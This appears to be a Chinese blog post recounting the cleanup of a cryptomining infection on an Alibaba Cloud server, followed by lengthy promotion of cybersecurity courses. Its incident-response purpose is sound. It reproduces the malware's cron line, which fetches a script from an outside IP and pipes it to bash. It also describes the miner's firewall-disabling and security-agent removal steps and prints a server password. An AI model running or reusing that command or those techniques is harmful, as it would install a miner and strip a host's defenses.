昨天下午一个朋友和我说,他的服务器被阿里云监测出来在挖矿,然后阿里云官方把服务器给关停了。
不用急,这个时候最简单的方法是在阿里云里提一个工单,反馈相关问题。
200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
解禁服务器
要解决问题、排查删除挖矿程序,首先我们需要解禁服务器,登录阿里云官方平台后,依次点击 控制台
-> 个人头像
-> 安全管控
进入相关页面。
在处罚列表,我们可以看到相关处罚记录,点击解除封禁
后即可正常进入服务器了。
会有提示,需要在解禁后三日内找到挖矿程序,并删除,否则官方会再次封禁服务器,而且无法再次进行解封(差不多意思就是,这个服务器就废了!直接被官方回收)
问题排查
“黑客”是怎么登录控制我的服务器的?
我们首先可以看阿里云提供的漏洞管理监测
,发现确实有一个漏洞,提示:Redis 未授权弱口令
。
我网络上查了,确实可以通过Redis向系统注入本地公钥到服务器的/root/.ssh/authorized_keys
中,然后“黑客”就可以在本地免密登录你的服务器了。。。
所以,如果你的服务器上安装了redis的话,可以首先考虑这个问题,引起这个问题的主要原因一般有:
- Redis设置了可远程登录(公网访问)
- Redis没有设置密码或者密码很简单
所以不是业务需求的话,不要开放redis远程登录,另外设置一个较为复杂的、不会在网络出现的密码,开放端口也可以改下,另外还有一个点就是不要用root用户启动redis,这样即使远程连接上redis,也无法去修改root下权限了~
具体相关介绍可以看这篇文章:blog.csdn.net/fdl123456/a…
上面了了可能是redis弱命令导致了“黑客”有机会登录我们的服务器,但我看了,我朋友的服务器上并没有安装redis(也不知道为啥阿里云会检测出这个漏洞)。。。
那我继续找问题,首先需要登录服务器,问登录密码的时候发现,登录密码在(阿里云客服)工单里?有点懵哈哈哈哈。。。
原来我这个朋友,之前因为自己改登录密码后没法远程连接,所以提工单找过客服帮忙改远程连接密码,而客服设置的密码应该算比较常见Aliyun2021@zSS
。。。到目前,个人感觉应该是远程连接密码被破解/泄漏,导致的挖矿程序侵入。(欢迎大家指正哈)
找到挖矿程序
一般来说,挖矿程序要想一直运行,那么必然会设置一些定时任务,在linux下一般用cron进行设置,其中用户可以使用crontab来设置定时任务。
首先我们可以输入crontab -e
编辑root用户的crontab文件内容,看看是否有定时任务;
crontab -e
(默认是使用vim编辑器,如果要退出编辑模式,可以先按ESC,再输入:qw
回车即可退出,Linux相关操作具体可以看拥有有一台服务器后,我竟然这么酷?)进入文件编辑,虽然指令不怎么能看懂,但是看到了一个网址、一个ip地址,首先非常确定这个ip不是我目前登录的这个服务器的,而且看整理链接,应该是下载了一个a.sh
文件,有点矿味了~
*/30 * * * * /bin/cdz -fsSL http://104.192.82.138/sxxxxx5/a/a.sh | bash > /dev/null 2>&1
我退出后,他还显示我没有修改权限?他奶奶的~可以使用ls -l /tmp/crontab.LQJ6aT
查看文件权限所属人,当然可以直接用sudo
指令强制修改或者删除。
我们可以查了下这个IP地址基本信息,可以看到,是一个美国的ip~那就八九不离十了,就是个挖矿的!!!
200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
那我们就继续来研究下前面找到的crontab
问题,首先进入到/tmp
目录下,查看所有crontab相关文件内容~
发现有的有,有的没有,我们直接使用rm -rf 文件名
删除所有相关文件:
sudo rm -rf crontab.*
我以为应该这样就好了,再次运行crontab -e
,发现会生成新的crontab.*
文件,而且自动有挖矿的内容~离谱!!!
思前想后,可能是crontab
配置的问题,输入下面指令看看相关配置文件~果不其然,
cat /etc/crontab
虽然还是不能完全看懂命令含义,但是看到这个newinit.sh
就知道没好事,
于是在自己云服务器上看了看,果然不同。
从网络上crontab
相关教程也可以看出,我自己的是正常的~
那是不是修改下crontab
配置文件就可以了呢?
简单分析挖矿程序
我们得来看看这个shit的挖矿脚本!!!从配置文件可以看出这个脚本在/etc/newinit.sh
,我们直接使用nano
来查看这个文件内容,
nano /etc/newinit.sh
可以看到这个脚本一共有125行代码~其他看不懂,这个函数名看懂了kill主进程~
接下来我们来一起看看,他这个脚本都做了些什么(老表我对linux相关操作并不熟悉,所以以下关于脚本文件的简单分析难免会有不正确或者错误的地方,敬请大家批评指正,但不可恶意攻击~):
part one
-
设置
ulimit
,修改了两个目录chattr
的权限,而chattr
可用于修改Linux文件系统上的文件属性,这样就是为什么之前即使在root用户下也会显示无法修改文件的原因。 -
关闭iptables和ufw防火墙、nmi(不可屏蔽的中断)看门狗,修改文件目录权限为只可追加、删除tmp、var文件夹中某些文件
part two
- 这里比较简单,设置了一些文件路径,然后进行一些乱七八糟的mv操作,相当于文件重命名了~
part three
- 大制作了,卸载阿里云相关的安全防护,阿里云安骑士aegis。
part four
- 挖矿程序配置,这个
zzh
是一个可执行程序,估计就是挖矿程序,newinit.sh
就是现在正在简单分享的挖矿程序脚本,也就是即使我把本地的脚本文件删除了,如果这里没删除,他又会从他自己的服务器上下载。
part five
- 这里不太理解,大概在判断程序指令是否正常?如果不正常就修改文件权限?有了解的可以补充下哈~
finally
- 感觉是一个函数,有
{
却没有}
,看函数意思是删除主程序进程, netstat -anp
显示各种网络相关信息,grep
进行ip或者端口查找,定位到行,awk
按指定设置输出对应文本,比如awk '{print $7}'
按空格/tab为界限输出文本中的第七项内容,|
是管道命令,作用是将左侧命令执行结果作为参数传递给右侧命令执行(需要经过xargs转换),xargs
可以将管道命令的左侧执行结果转换成命令行参数,传递给右侧命令执行
最后,我又看了下part four中提到的挖矿程序配置里的链接,不看不知道,一看吓一跳,原来这个有996行代码(是在暗示什么吗!!!)
修改了很多系统配置~如果服务器里要是有什么重要的东西,或者之前配过什么很麻烦的环境,要修改还是挺麻烦了!
清理挖矿程序
最简单的方法就是直接重置系统,我这里也选择的这种方法,因为这个朋友服务器里没啥要备份的。
如前面所说,如果有很多重要东西和难配置的环境,你不想花时间备份和再配置一变,你可以选择根据挖矿脚本程序去一个个修复他对系统的修改。。。看着996行代码就觉得心累!
重置系统的话就相对会简单很多,进入到阿里云控制台,然后找到对应实例,先停止服务器,然后点击更多
-> 云盘和镜像
-> 更换操作系统
。
会有一个更换提醒,建议仔细看一遍。
更换操作系统可以选择和之前一样的配置,或者其他配置,然后点击确认订单
即可。
更换成功后,会自动启动服务器,我们可以点击管理控制台
,然后尝试远程登录下。
这里相关操作和设置和我们之前分享的拥有有一台服务器后,我竟然这么酷?中的介绍基本一致,通过下图,我们可以看到crontab
配置是正常的了。
最后我们可以过一段时间后看看cpu使用情况,可以看到之前基本都是100%使用率,重置系统后,使用率变成了2.6%左右。
200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
服务器安全防范建议
首先防范的前提是不影响我们使用,甚至所有操作应该是方便我们使用的。
1、目前我还是推荐初次接触或者对云服务器不熟的读者朋友使用宝塔面板
来登录、操作服务器内容,具体功能和使用方法,大家可以看我之前的分享Linux里的宝塔,真正的宝塔!详细教程。
2、所有安装的应用服务,尽量不要使用默认端口号,有密码的设置密码,不要嫌麻烦,可以是用1password.com
这个网站生成随机密码,我之前也分享过一个脚本~
import string
import random
while True:
try:
password_len = int(input('请输入密码长度(只能是数字):'))
password = ''.join(random.choices(string.printable.strip(), k=password_len))
print(f'你的新密码为:{password},请保存好~')
except Exception as e:
print(f'【出错啦】看看是不是输入错误吧,可能是输入了非数字内容,错误信息:{e}')
print('*** 想结束就输入0吧!!!***')
print('*** 回车继续生成新密码 ***')
flag = input('是否继续生成新密码:')
if flag == '0':
break
print('******************************************')
3、系统自带的防火墙、安全防护都不要关闭~
其他的方法,欢迎大家补充~今天就到这里啦!
坚持 and 努力 : 终有所获。
题外话
初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:
-
2023届全国高校毕业生预计达到1158万人,就业形势严峻;
-
国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。
一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。
6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
2022届大学毕业生月收入较高的前10个专业
本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。
具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。
网络安全行业特点
1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
2、人才缺口大,就业机会多
2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取